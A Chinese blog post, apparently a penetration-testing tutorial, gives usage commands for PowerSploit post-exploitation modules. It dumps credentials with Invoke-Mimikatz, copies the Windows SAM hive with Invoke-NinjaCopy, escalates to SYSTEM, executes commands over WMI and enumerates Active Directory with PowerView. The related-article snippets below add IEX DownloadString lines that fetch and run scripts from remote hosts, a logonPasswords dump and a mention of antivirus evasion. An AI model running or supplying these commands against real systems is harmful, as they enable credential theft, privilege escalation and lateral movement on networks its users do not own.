PowerSploit的使用

最新推荐文章于 2024-04-23 22:00:47 发布
最新推荐文章于 2024-04-23 22:00:47 发布
阅读量643 收藏 1
点赞数
分类专栏: 渗透工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/84672113
版权
Invoke-Mimikatz(依赖管理员)
Import-Module .\invoke-mimikatz.ps1
Invoke-Mimikatz –DumpCreds

在这里插入图片描述
使用Invoke-Mimikatz –command “mimikatz命令”来执行命令:

Invoke-Mimikatz –command "token::elevate"

在这里插入图片描述

Invoke-Ninjacopy (依赖管理员)

直接拷贝系统文件:
在这里插入图片描述

Import-Module .\invoke-ninjacopy.ps1
invoke-ninjacopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\Users\administrator\Desktop\SAM

在这里插入图片描述

Get-System (依赖管理员)
Import-Module .\Get-System 
get-system

在这里插入图片描述

Invoke-Portscan

扫描Top50端口:

Invoke-Portscan –Hosts ip地址 –TopPorts 50

在这里插入图片描述
扫描特定端口:

Invoke-Portscan –Hosts ip地址 –Ports 端口

在这里插入图片描述

Invoke-ReverseDnsLookup

反向解析IP地址:

Import-Module .\Invoke-ReverseDnsLookup.ps1
Invoke-ReverseDnsLookup 192.168.91.131

在这里插入图片描述

Invoke-Wmicommand
Import-Module .\Invoke-Wmicommand.ps1
Invoke-Wmicommand -Payload {whoami}

在这里插入图片描述

Get-NetDomain
Import-Module .\PowerView.ps1
Get-NetDomain

在这里插入图片描述

Get-NetDomainController
get-NetDomainController

在这里插入图片描述

Invoke-ProcessHunter –ProcessName 进程名
Invoke-ProcessHunter –ProcessName powershell

在这里插入图片描述

Get-NetShare获取共享信息
get-netshare

在这里插入图片描述

浅笑⁹⁹⁶
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Invoke-Mimikatz.ps1脚本使用
墨痕诉清风的博客
05-31 503
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonPasswords full"' //获取密码。有时当获得权限时无法使用mimikatz.exe时,可以考虑使用Invoke-Mimikatz.ps1脚本获取想要的数据。Import-Module .\Invoke-Mimikatz.ps1 //导入命令。Set-ExecutionPolicy Unrestricted //打开限制。
PowerSploitPowerSploit-PowerShell开发后框架
02-18
该项目不再受支持PowerSploit是Microsoft ...Invoke-WmiCommand 在目标计算机上执行PowerShell脚本块,并使用WMI作为C2通道返回其格式化输出。脚本修改修改和/或准备脚本以在受感染的计算机上执行。Out-Encoded
Invoke-Portscan、Invoke-Mimikatz、Get-Keystrokes
weixin_46104215的博客
11-08 480
一、Invoke-Portscan Recon 模块的一个脚本,主要用于端口扫描 1.下载脚本 IEX(New-Object Net.WebClient).DownloadString("http://192.168.110.130/PowerSploit/Recon/Invoke-Portscan.ps1") 2.扫描 Invoke-Portscan -Hosts 192.168.110.130, 192.168.110.142 -Ports "80,22,4444" 二、Invo
PowerSploit
最新发布
sinat_25635183的博客
04-23 1295
PowerSploit是一套用于PowerShell的开源渗透测试工具集,旨在帮助安全专业人员评估和增强Windows环境的安全性。它包含了各种模块和技术,可用于执行各种攻击和渗透测试任务,如权限提升、横向移动、信息收集等。PowerShell脚本模块:PowerSploit提供了一系列PowerShell脚本,用于执行各种渗透测试任务。这些脚本包括各种攻击技术,如Shellcode执行、凭据盗窃、权限提升等。Mimikatz模块。
【后渗透】Mimikatz使用大全
hacker3062的博客
10-14 1758
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文密码!
内网渗透中mimikatz使用
热门推荐
pyphrb的博客
07-28 4万+
0x01 简介mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单0x02 测试环境网络资源管理模式:域 已有资源:域内一台主机权限 操作系统:win7 x64 域权限:普通用户0x03 测试目标1、获得域控权限 2、导出所有用户口令 3、维持域控权限0x04 测试过程1、获取本机信息mimikatz:privilege::debug sekurlsa::logonpas
萌新如何玩转mimikatz
m0_71745484的博客
02-13 5726
mimikatz就是我遇见的一个坎
PowEnum:执行常见的PowerSploit Powerview功能,然后将输出合并到电子表格中以方便分析
04-28
PowEnum 渗透测试人员通常会枚举AD数据-提供领域态势感知并帮助识别软目标。 PowEnum可帮助自动执行目标域的制图视图。 PowEnum执行常见的... 第一个使用runas命令(必须在使用PowEnum之前执行此命令)。 第二
pywerview:PowerSploitPowerView 的(部分)Python 重写
08-05
PywerView ____ __ ___ | _ \ _ ___ __...历史作为一名渗透测试员,我喜欢在作业期间使用 PowerView。 它可以轻松找到易受攻击的机器,或列出哪些域用户被添加到机器的本地管理员组,等等。 但是,在未连接到域的计算机
pywerview, PowerSploit的( 部分) python 重写是 PowerView.zip
09-17
Pywerview是一个开源项目,它是PowerSploit工具集的一部分,被重写为Python语言版本,命名为PowerView PywerView。这个项目的主要目的是提供一个跨平台的解决方案,使得网络安全研究人员、渗透测试人员以及系统管理...
PowerSploit_Sensitive_Info_Hunter:修改后的PowerSploitPowerView可以搜索文件并与RegEx匹配以获取敏感信息(PII,PCI,密码,用户名,SNMP字符串等)
04-27
PowerSploit是一个强大的 PowerShell 模块集合,主要由安全研究人员和渗透测试人员使用,用于进行安全评估和漏洞利用。在给定的“PowerSploit_Sensitive_Info_Hunter”项目中,我们关注的是如何利用PowerShell来查找...
Invoke-Mimikatz.txt
03-01
Invoke-Mimikatz
powershell + Invoke-Mimikatz.ps1获取系统密码
大方子
10-29 5912
参照:https://blog.51cto.com/simeon/2126106 进行实现 Invoke-Mimikatz.ps1下载地址 https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 (1)目标主机具备网络环境 power...
Invoke-Mimikatz.ps1获取系统密码
weixin_34357267的博客
06-07 962
(1)Invoke-Mimikatz.ps1下载地址https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1(2)具备网络环境直接执行命令powershell "IEX (New-Object Net.WebClient).DownloadString('...
通过xencrypt免杀invoke-mimikatz.ps1
网络安全。
03-03 1574
0x01 简介 xencrypt目前测试只在windows 2012 powershell下可正常使用,需要依赖原本的invoke-mimikatz.ps1,生成以后可多次使用。 0x02 使用 1、下载invoke-mimikatz.ps1到同级目录下。 https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exf...
一句powershell调用mimikatz抓密码
weixin_30950237的博客
05-13 413
mimikatz神器大家都知道吧,可以抓取系统内的明文密码,但是平时我们测试的时候需要把mimikatz的几个文件上传到目标系统上面,然后再手工执行几个命令才能搞定,今天无意访问一个大神的博客,发现其实可以利用powershell一句话搞定,是国外大神的方法。 国外大神clymb3r写的一个powershell脚本将mimikatz注入到内存调用logonPasswords获取密码,使用起来相当...
PowerSploit渗透教程
weixin_43749601的博客
03-21 2055
简介 PowerSploit是一款基于PowerShell的后渗透框架软件,包含很多Powershell攻击脚本,它们主要是用于渗透中的信息侦查、权限提升、权限维持。 https://github.com/mattifestation/PowerSploit Linux下安装和搭建Powersploit 开启Apache服务 将下载好的文件放在/var/www/html目录,搭建一个简易的服务器 在网页中打开http://localhost/PowerSploit-master/ Powersploi
PowerSploit 使用方法
weixin_44844556的博客
03-13 305
powersploit
内网渗透一周目通关
qq_31812157的博客
07-17 1万+
内网渗透学习笔记,自己看的
powersploit
07-29
PowerSploit是一款基于PowerShell的后渗透框架软件,它包含了许多用于渗透测试的攻击脚本。这些脚本主要用于信息侦查、权限提升和权限维持等方面的操作。\[1\]其中,Invoke-MimikatzPowerSploit中的一个脚本,属于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值